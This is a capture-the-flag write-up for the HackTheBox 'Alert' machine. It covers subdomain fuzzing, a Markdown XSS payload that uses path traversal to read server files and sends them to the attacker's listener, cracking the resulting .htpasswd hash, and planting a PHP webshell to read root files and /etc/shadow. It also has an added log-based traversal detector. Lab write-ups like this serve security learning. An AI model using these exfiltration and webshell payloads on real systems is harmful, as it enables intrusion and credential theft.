HackTheBox Alert Writeup

Explore the fundamentals of cybersecurity in the Alert Capture The Flag (CTF) challenge, an easy-level experience! This straightforward CTF writeup provides insights into key concepts with clarity and simplicity, making it accessible for players at this level.

Add Hosts

10.10.11.44 alert.htb statistics.alert.htb

Script to add hosts automatically

ip="10.10.11.44"
domain="alert.htb statistics.alert.htb"
grep -qF "$ip $domain" /etc/hosts || echo -e "$ip $domain" | sudo tee -a /etc/hosts

Mapping

nmap -sCV alert.htb
Nmap scan report for alert.htb (10.10.11.44)
Host is up (0.055s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 7e:46:2c:46:6e:e6:d1:eb:2d:9d:34:25:e6:36:14:a7 (RSA)
|   256 45:7b:20:95:ec:17:c5:b4:d8:86:50:81:e0:8c:e8:b8 (ECDSA)
|_  256 cb:92:ad:6b:fc:c8:8e:5e:9f:8c:a2:69:1b:6d:d0:f7 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
| http-title: Alert - Markdown Viewer
|_Requested resource was index.php?page=alert
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Subdomain

ffuf -w /usr/share/dict/SecLists/Discovery/DNS/subdomains-top1million-20000.txt -u http://alert.htb -H 'Host: FUZZ.alert.htb' -fw 20
statistics              [Status: 401, Size: 467, Words: 42, Lines: 15, Duration: 54ms]

WebServer:

python -m http.server

Markdown XSS:

<script>
fetch("http://alert.htb/messages.php?file=../../../../../etc/apache2/sites-enabled/000-default.conf")
.then(response => response.text())
.then(data => {
    fetch("http://<vpnip>:8000/?data=" + encodeURIComponent(data));
})
.catch(error => console.error("Error fetching the messages:", error));
</script>

URL-decode the response.

The decoded configuration shows /var/www/statistics.alert.htb/.htpasswd, so request that file next:

<script>
fetch("http://alert.htb/messages.php?file=../../../../../var/www/statistics.alert.htb/.htpasswd")
.then(response => response.text())
.then(data => {
    fetch("http://<vpnip>:8000/?data=" + encodeURIComponent(data));
})
.catch(error => console.error("Error fetching the messages:", error));
</script>

URL-decode the response.
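Seen from the defender's side, both requests above hit messages.php with a file value that climbs out of its directory, and that is detectable in the web server's access log. The following is an added example, not part of the original writeup: it assumes Apache common/combined log format, and the sample log lines (addresses, timestamps, sizes, the benign file name) are constructed.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Request field of an Apache common/combined log line: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')

def escaping_file_value(log_line, script="messages.php", param="file"):
    """Return the decoded `file` value if it leaves its directory, else None."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return None
    url = urlsplit(m.group("target"))
    if not url.path.endswith("/" + script):
        return None
    for value in parse_qs(url.query, keep_blank_values=True).get(param, []):
        # parse_qs decodes once; two more passes expose double encoding (%252e)
        for _ in range(2):
            value = unquote(value)
        segments = re.split(r"[\\/]+", value)
        if ".." in segments or value.startswith(("/", "\\")) or "\x00" in value:
            return value
    return None

def flag_lines(lines):
    """Return (index, decoded value) for every log line that should raise an alert."""
    hits = []
    for i, line in enumerate(lines):
        value = escaping_file_value(line)
        if value is not None:
            hits.append((i, value))
    return hits

# Constructed sample log: only the messages.php paths mirror the requests in this writeup.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2025:10:00:00 +0000] "GET /messages.php?file=2024-03-10_15-48-34.txt HTTP/1.1" 200 312 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [01/Jan/2025:10:00:05 +0000] "GET /messages.php?file=../../../../../etc/apache2/sites-enabled/000-default.conf HTTP/1.1" 200 1100 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [01/Jan/2025:10:00:09 +0000] "GET /messages.php?file=..%2F..%2F..%2Fvar%2Fwww%2Fstatistics.alert.htb%2F.htpasswd HTTP/1.1" 200 57 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [01/Jan/2025:10:00:12 +0000] "GET /index.php?page=alert HTTP/1.1" 200 966 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [01/Jan/2025:10:00:15 +0000] "GET /messages.php?file=%252e%252e%252fconfig.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for i, value in flag_lines(SAMPLE_LOG):
        print(f"line {i}: file={value!r}")
```

The same segment check, applied inside the endpoint before the file is opened, is what closes the read in the first place; the log rule only tells you it was attempted.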

Brute Force the Hash

echo -n "Password Hash? -->" ; read hash
echo "$hash" > /tmp/hash.txt
hashcat -m 1600 -a 0 /tmp/hash.txt /usr/share/dict/rockyou.txt
hashcat -m 1600 /tmp/hash.txt --show
rm -rf /tmp/hash.txt

This yields manchesterunited

ssh -L 8080:127.0.0.1:8080 albert@alert.htb
cat user.txt
cd /opt/website-monitor/config
echo '<?php system($_GET['cmd']);?>' > webshell.php

On your machine:

curl -s 'http://127.0.0.1:8080/config/webshell.php?cmd=cat%20/root/root.txt'
curl -s 'http://127.0.0.1:8080/config/webshell.php?cmd=cat%20/etc/shadow'

$6$gSjyQo8nJFMsegNG$jRRGms4KAq1FGTXwBJl236Ui5OKRtmaM3k8nkXuvduPXnhhaT/ZCYHHYO3GxhUAik1NaFYlBGaQZBrzQHgOhc/

This post is licensed under CC BY 4.0 by the author.